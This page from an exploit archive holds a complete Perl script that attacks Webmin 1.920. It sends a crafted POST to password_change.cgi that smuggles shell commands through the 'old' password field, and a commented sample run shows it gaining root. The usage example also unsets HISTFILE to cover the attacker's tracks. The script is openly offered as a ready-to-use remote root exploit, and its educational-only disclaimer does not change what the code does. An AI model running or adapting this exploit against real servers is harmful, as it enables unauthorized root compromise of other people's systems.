what you don't know can hurt you

Webmin 1.920 Remote Root

Webmin 1.920 Remote Root
Posted Aug 20, 2019
Authored by Todor Donev

Webmin version 1.920 remote root exploit.

tags | exploit, remote, root
MD5 | e3174202504ae321de08a1dd89c21438

Webmin 1.920 Remote Root

Change Mirror Download
#!/usr/bin/perl -w
#
# Webmin 1.920 Remote Root Exploit
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
# Disclaimer:
# This or previous programs are for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# The other exploits not works for me..
#
# Tested on CentOS
#
# [test@localhost ~]$ perl webmin.pl
# [ Webmin 1.920 Remote Root Exploit
# [ ==========================================================
# [ First time released at Defcon
# [ Thank you guys, for all..
# [ Exploit by: Todor Donev
# [ <todor.donev@gmail.com>
# [ ==========================================================
# [ Usage: webmin.pl <host> <port> <command>
# [ e.g. webmin.pl localhost 10000 "unset HISTFILE;uname -a;id;uptime"
#
# uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
# [test@localhost ~]$
#
#
#
# ATTENTION !! ATTENTION !! ATTENTION !! ATTENTION !! ATTENTION !!
#
# Guys, please give a star to https://github.com/otvorete/petition
# to support the cause of the Bulgarian Hackers (Developers) Community.
# We want to makes our Electronic Government more securŠµ, transparent
# and reliable. For this reason we want from our government to open
# the source codes of the applications. So support us with a star,
# please..
#
# Special thanks to Konstantin Spirov that starting the cause!!
#
#

use strict;
use HTTP::Request;
use LWP::UserAgent;

my $host = shift || 'localhost';
my $port = shift || '10000';
my $cmd = shift || 'uname -a;id;uptime';
$cmd =~ s/\|/\;/g;

print "[ Webmin 1.920 Remote Root Exploit\n";
print "[ ==========================================================\n";
print "[ First time released at Defcon\n";
print "[ Thank you guys, for all..\n";
print "[ Exploit by: Todor Donev\n";
print "[ <todor.donev\@gmail.com>\n";
print "[ ==========================================================\n";
print "[ Usage: $0 <host> <port> <command>\n";
print "[ e.g. $0 localhost 10000 \"unset HISTFILE;uname -a;id;uptime\"\n";
my $browser = LWP::UserAgent ->new(ssl_opts => { verify_hostname => 0 });
$browser->timeout(5);
$browser->agent('Mozilla/5.0');
my $target = "https://".$host.":".$port."/password_change.cgi";
my $request = HTTP::Request->new (
POST => $target,
[ Content_Type => "application/x-www-form-urlencoded" ,
Referer => "https://".$host.":".$port."/session_login.cgi" ],
"user=wheel&pam=&expired=2&old=id|echo OWNED;$cmd;echo OWNED&new1=wheel&new2=wheel");
$request->header("Cookie" => "redirect=1; testing=1; sid=x; sessiontest=1;");
my $content = $browser->request($request)->as_string();
print $1 and exit if ($content =~ m/OWNED(.*?)OWNED/ms);
print "[ Exploit Failed!\n" and exit if (not $content =~ m/OWNED(.*?)OWNED/ms);

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    2 Files
  • 15
    Sep 15th
    1 Files
  • 16
    Sep 16th
    11 Files
  • 17
    Sep 17th
    16 Files
  • 18
    Sep 18th
    8 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close